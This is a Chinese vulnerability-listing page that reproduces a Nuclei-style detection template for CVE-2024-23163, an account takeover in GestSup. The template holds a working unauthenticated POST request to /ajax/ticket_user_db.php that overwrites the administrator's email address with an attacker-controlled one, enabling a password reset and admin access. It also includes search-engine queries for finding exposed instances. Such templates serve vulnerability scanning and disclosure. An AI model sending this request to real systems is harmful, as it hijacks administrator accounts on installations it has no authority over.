CVE-2024-23163: GestSup - Account Takeover

日期: 2025-08-01 | 影响软件: GestSup | POC: 已公开

漏洞描述

PoC代码[已公开]

id: CVE-2024-23163

info:
  name: GestSup - Account Takeover
  author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
  severity: critical
  impact: |
    An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset.
  remediation: Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place.
  reference:
    - https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163
    - https://doc.gestsup.fr/install/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-23163
    cwe-id: CWE-287
    cpe: cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gestsup
    fofa-query: title="GestSup"
    shodan-query: http.favicon.hash:-283003760
    product: gestsup
  tags: cve,cve2024,account-takeover,gestsup,vuln

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /ajax/ticket_user_db.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: xmlhttprequest
        Content-Type: application/x-www-form-urlencoded

        modifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"status":"success'
          - 'firstname":"{{firstname}}","lastname":"{{lastname}}'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

    extractors:
      - type: dsl
        dsl:
          - '"Firstname: "+ firstname'
          - '"Lastname: "+ lastname'
# digest: 4a0a00473045022036c7f10e7995e930cca06e70073c3ead31f6a4bb5a8d3c02aefd0a36d14bb577022100b39b8d77acde6aca02393a4cd6eaa052e000917b2ff4a52453e53c72aba403be:922c64590222798bb761d5b6d8e72950

相关漏洞推荐